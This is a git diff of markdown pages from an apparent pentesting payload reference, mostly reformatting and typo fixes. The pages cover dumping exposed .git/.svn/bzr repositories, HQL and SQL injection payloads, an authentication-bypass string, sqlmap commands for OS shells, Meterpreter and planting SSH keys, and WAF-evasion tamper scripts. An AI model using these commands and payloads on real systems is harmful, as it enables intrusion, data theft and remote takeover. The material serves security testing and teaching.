```powershell + wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f + mkdir .git/object/cb + mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ + git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f + ``` #### Recovering file contents from .git/index @@ -106,14 +110,14 @@ gin ~/git-repo/.git/index Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. ```powershell -$ gin .git/index | egrep -e "name|sha1" +$ gin .git/index | egrep -e "name|sha1" name = AWS Amazon Bucket S3/README.md sha1 = 862a3e58d138d6809405aa062249487bee074b98 name = CRLF injection/README.md sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 ``` - + ### Tools #### Automatic recovery @@ -126,12 +130,12 @@ pip install -r requirements.txt ./git-dumper.py http://web.site/.git ~/website ``` -##### digit.py +##### diggit.py ```powershell -git clone https://github.com/bl4de/security-tools/ && cd security-tools/digit -./digit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] -./digit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 +git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit +./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] +./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 -u is remote path, where .git folder exists -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) @@ -153,7 +157,7 @@ git checkout git clone https://github.com/kost/dvcs-ripper perl rip-git.pl -v -u "http://web.site/.git/" -git cat-file -p 07603070376d63d911f608120eb4b5489b507692 +git cat-file -p 07603070376d63d911f608120eb4b5489b507692 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 parent 15ca375e54f056a576905b41a417b413c57df6eb author Michael 1489389105 +0000 @@ -235,14 +239,14 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base ``` 1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db - ```powershell - INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); - ``` + ```powershell + INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); + ``` 2. Download interesting files - * remove \$sha1\$ prefix - * add .svn-base postfix - * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) - * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` + - remove \$sha1\$ prefix + - add .svn-base postfix + - use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) + - create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` ### Tools @@ -269,7 +273,7 @@ docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-b ```powershell git clone https://github.com/SeahunOh/bzr_dumper python3 dumper.py -u "http://127.0.0.1:5000/" -o source -Created a standalone tree (format: 2a) +Created a standalone tree (format: 2a) [!] Target : http://127.0.0.1:5000/ [+] Start. [+] GET repository/pack-names @@ -286,7 +290,7 @@ Created a standalone tree (format: 2a) $ bzr revert N application.py N database.py - N static/ + N static/ ``` ## Mercurial @@ -303,5 +307,5 @@ docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-h ## References - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) -- [bl4de, digit](https://github.com/bl4de/security-tools/tree/master/digit) +- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) - [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index ea8192a..3bb07cf 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -2,28 +2,28 @@ :warning: Content of this page has been moved to [InternalAllTheThings/redteam/pivoting/network-pivoting-techniques](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/) -* [SOCKS Compatibility Table](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table) -* [Windows netsh Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding) -* [SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh) - * [SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy) - * [Local Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding) - * [Remote Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding) -* [Proxychains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains) -* [Graftcp](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp) -* [Web SOCKS - reGeorg](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg) -* [Web SOCKS - pivotnacci](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci) -* [Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit) -* [sshuttle](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle) -* [chisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel) - * [SharpChisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel) -* [ghost](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ghost) -* [Rpivot](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot) -* [RevSocks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks) -* [plink](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink) -* [ngrok](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok) -* [Capture a network trace with builtin tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools) -* [Basic Pivoting Types](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types) - * [Listen - Listen](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen) - * [Listen - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect) - * [Connect - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect) -* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references) \ No newline at end of file +- [SOCKS Compatibility Table](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table) +- [Windows netsh Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding) +- [SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh) + - [SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy) + - [Local Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding) + - [Remote Port Forwarding](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding) +- [Proxychains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains) +- [Graftcp](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp) +- [Web SOCKS - reGeorg](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg) +- [Web SOCKS - pivotnacci](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci) +- [Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit) +- [sshuttle](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sshuttle) +- [chisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#chisel) + - [SharpChisel](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#sharpchisel) +- [gost](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#gost) +- [Rpivot](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#rpivot) +- [RevSocks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#revsocks) +- [plink](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#plink) +- [ngrok](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ngrok) +- [Capture a network trace with builtin tools](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#capture-a-network-trace-with-builtin-tools) +- [Basic Pivoting Types](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#basic-pivoting-types) + - [Listen - Listen](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---listen) + - [Listen - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#listen---connect) + - [Connect - Connect](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#connect---connect) +- [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#references) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index d8b2d15..fe66cd7 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,19 +1,19 @@ -# Hibernate Query Language Injection +# Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia ## Summary -* [HQL Comments](#hql-comments) -* [HQL List Columns](#hql-list-columns) -* [HQL Error Based](#hql-error-based) -* [Single Quote Escaping](#single-quote-escaping) -* [$-quoted strings](#--quoted-strings) -* [DBMS Magic functions](#dbms-magic-functions) -* [Unicode](#unicode) -* [Java constants](#java-constants) -* [Methods by DBMS](#methods-by-dbms) -* [References](#references) +- [HQL Comments](#hql-comments) +- [HQL List Columns](#hql-list-columns) +- [HQL Error Based](#hql-error-based) +- [Single Quote Escaping](#single-quote-escaping) +- [$-quoted strings](#--quoted-strings) +- [DBMS Magic functions](#dbms-magic-functions) +- [Unicode](#unicode) +- [Java constants](#java-constants) +- [Methods by DBMS](#methods-by-dbms) +- [References](#references) :warning: Your input will always be between the percentage symbols: `%INJECT_HERE%` @@ -28,7 +28,7 @@ HQL does not support comments ```sql from BlogPosts where title like '%' - and DOESNT_EXIST=1 and ''='%' -- + and DOESNT_EXIST=1 and ''='%' -- and published = true ``` @@ -120,7 +120,7 @@ Hibernate resolves Java public static fields (Java constants) in HQL queries: - Ex. `java.lang.Character.SIZE` is resolved to 16 - String or char constants are additionally surrounded by single quotes -To use JAVA CONSTANTS method we need special char or string fields declared in classes or interfaces on classpath. +To use JAVA CONSTANTS method we need special char or string fields declared in classes or interfaces on classpath. ```java public class Constants { @@ -156,9 +156,9 @@ dummy' and hqli.persistent.Constants.C_QUOTE_1*X('<>CHAR(41) and (select count(1 ## References -* [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) -* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) -* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/resources/hql2sql_sstic_2015_en.pdf) -* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) -* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf) -* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) +- [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) +- [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) +- [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) +- [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) +- [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf) +- [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index d06c9d8..9a12e23 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -3,6 +3,7 @@ > A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: + - Information Leakage - Disclosure of stored data - Manipulation of stored data @@ -10,54 +11,53 @@ Attempting to manipulate SQL queries may have goals including: ## Summary -* [CheatSheets](#cheatsheets) - * [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) - * [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) - * [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) - * [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) - * [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) - * [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) - * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) - * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) -* [Entry point detection](#entry-point-detection) -* [DBMS Identification](#dbms-identification) -* [SQL injection using SQLmap](#sql-injection-using-sqlmap) - * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) - * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) - * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) - * [Second order injection](#second-order-injection) - * [Shell](#shell) - * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) - * [Using TOR with SQLmap](#using-tor-with-sqlmap) - * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) - * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) - * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) - * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) - * [SQLmap without SQL injection](#sqlmap-without-sql-injection) -* [Authentication bypass](#authentication-bypass) - * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) -* [Polyglot injection](#polyglot-injection-multicontext) -* [Routed injection](#routed-injection) -* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) -* [Generic WAF Bypass](#generic-waf-bypass) - * [White spaces alternatives](#white-spaces-alternatives) - * [No Comma Allowed](#no-comma-allowed) - * [No Equal Allowed](#no-equal-allowed) - * [Case modification](#case-modification) - +- [CheatSheets](#cheatsheets) + - [MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) + - [MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) + - [OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) + - [PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) + - [SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) + - [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) + - [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) + - [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) +- [Entry point detection](#entry-point-detection) +- [DBMS Identification](#dbms-identification) +- [SQL injection using SQLmap](#sql-injection-using-sqlmap) + - [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) + - [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) + - [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie) + - [Second order injection](#second-order-injection) + - [Shell](#shell) + - [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) + - [Using TOR with SQLmap](#using-tor-with-sqlmap) + - [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) + - [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) + - [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) + - [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) + - [SQLmap without SQL injection](#sqlmap-without-sql-injection) +- [Authentication bypass](#authentication-bypass) + - [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) +- [Polyglot injection](#polyglot-injection-multicontext) +- [Routed injection](#routed-injection) +- [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) +- [Generic WAF Bypass](#generic-waf-bypass) + - [White spaces alternatives](#white-spaces-alternatives) + - [No Comma Allowed](#no-comma-allowed) + - [No Equal Allowed](#no-equal-allowed) + - [Case modification](#case-modification) ## Tools -* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool -* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws - +- [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool +- [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws ## Entry point detection Detection of an SQL injection entry point -* **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point. - * Simple characters +- **Error Messages**: Inputting special characters (e.g., a single quote ') into input fields might trigger SQL errors. If the application displays detailed error messages, it can indicate a potential SQL injection point. + + - Simple characters ```sql ' %27 @@ -71,19 +71,20 @@ Detection of an SQL injection entry point Wildcard (*) ' # required for XML content ``` - * Multiple encoding + - Multiple encoding ```sql %%2727 %25%27 ``` - * Unicode characters + - Unicode characters ``` Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` -* **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable. - * Merging characters +- **Tautology-Based SQL Injection**: By inputting tautological (always true) conditions, you can test for vulnerabilities. For instance, entering `admin' OR '1'='1` in a username field might log you in as the admin if the system is vulnerable. + + - Merging characters ```sql `+HERP '||'DERP @@ -92,7 +93,7 @@ Detection of an SQL injection entry point '%20'HERP '%2B'HERP ``` - * Logic Testing + - Logic Testing ```sql page.asp?id=1 or 1=1 -- true page.asp?id=1' or 1=1 -- true @@ -100,9 +101,7 @@ Detection of an SQL injection entry point page.asp?id=1 and 1=2 -- false ``` -* **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable. - - +- **Timing Attacks**: Inputting SQL commands that cause deliberate delays (e.g., using `SLEEP` or `BENCHMARK` functions in MySQL) can help identify potential injection points. If the application takes an unusually long time to respond after such input, it might be vulnerable. ## DBMS Identification @@ -128,7 +127,7 @@ Detection of an SQL injection entry point ["last_insert_rowid()>1" ,"SQLITE"], ["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"], ["val(cvar(1))=1" ,"MSACCESS"], -["IF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], +["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], ["cdbl(1)=cdbl(1)" ,"MSACCESS"], ["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], @@ -136,19 +135,19 @@ Detection of an SQL injection entry point ## DBMS Identification VIA Error -DBMS | Example Error Message | Example Payload | -|---------------------|------------------------------------------------------------------------------------------|-----------------| -| MySQL | `You have an error in your SQL syntax; ... near '' at line 1` | `'` | -| PostgreSQL | `ERROR: unterminated quoted string at or near "'"` | `'` | -| PostgreSQL | `ERROR: syntax error at or near "1"` | `1'` | -| Microsoft SQL Server| `Unclosed quotation mark after the character string ''.` | `'` | -| Microsoft SQL Server| `Incorrect syntax near ''.` | `'` | -| Microsoft SQL Server| `The conversion of the varchar value to data type int resulted in an out-of-range value.`| `1'` | -| Oracle | `ORA-00933: SQL command not properly ended` | `'` | -| Oracle | `ORA-01756: quoted string not properly terminated` | `'` | -| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` | ------------------------------------------------------------------------------------------------------------------------------------- +| DBMS | Example Error Message | Example Payload | +| -------------------- | ----------------------------------------------------------------------------------------- | --------------- | +| MySQL | `You have an error in your SQL syntax; ... near '' at line 1` | `'` | +| PostgreSQL | `ERROR: unterminated quoted string at or near "'"` | `'` | +| PostgreSQL | `ERROR: syntax error at or near "1"` | `1'` | +| Microsoft SQL Server | `Unclosed quotation mark after the character string ''.` | `'` | +| Microsoft SQL Server | `Incorrect syntax near ''.` | `'` | +| Microsoft SQL Server | `The conversion of the varchar value to data type int resulted in an out-of-range value.` | `1'` | +| Oracle | `ORA-00933: SQL command not properly ended` | `'` | +| Oracle | `ORA-01756: quoted string not properly terminated` | `'` | +| Oracle | `ORA-00923: FROM keyword not found where expected` | `1'` | +--- ## SQL injection using SQLmap @@ -182,11 +181,10 @@ sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrat ### Shell -* SQL Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell` -* OS Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell` -* Meterpreter: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn` -* SSH Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/` - +- SQL Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell` +- OS Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell` +- Meterpreter: `python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn` +- SSH Shell: `python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/` ### Crawl a website with SQLmap and auto-exploit @@ -222,80 +220,79 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/ python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` - ### General tamper option and tamper's list ```powershell tamper=name_of_the_tamper ``` -| Tamper | Description | -| --- | --- | -|0x2char.py | Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),…) counterpart | -|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | -|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| -|appendnullbyte.py | Appends encoded NULL byte character at the end of payload | -|base64encode.py | Base64 all characters in a given payload | -|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | -|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | -|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | -|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | -|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | -|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | -|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| -|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| -|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() | -|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| -|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | -|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | -|equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' | -|escapequotes.py | Slash escape quotes (' and ") | -|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | -|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | -|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') | -|ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart| -|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| -|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier | -|least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | -|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | -|modsecurityversioned.py | Embraces complete query with versioned comment | -|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | -|multiplespaces.py | Adds multiple spaces around SQL keywords | -|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| -|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | -|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | -|percentage.py | Adds a percentage sign ('%') in front of each character | -|plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | -|plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | -|randomcase.py | Replaces each keyword character with random case value | -|randomcomments.py | Add random comments to SQL keywords| -|securesphere.py | Appends special crafted string | -|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | -|space2comment.py | Replaces space character (' ') with comments | -|space2dash.py | Replaces space character (' ') with a dash comment ('--') 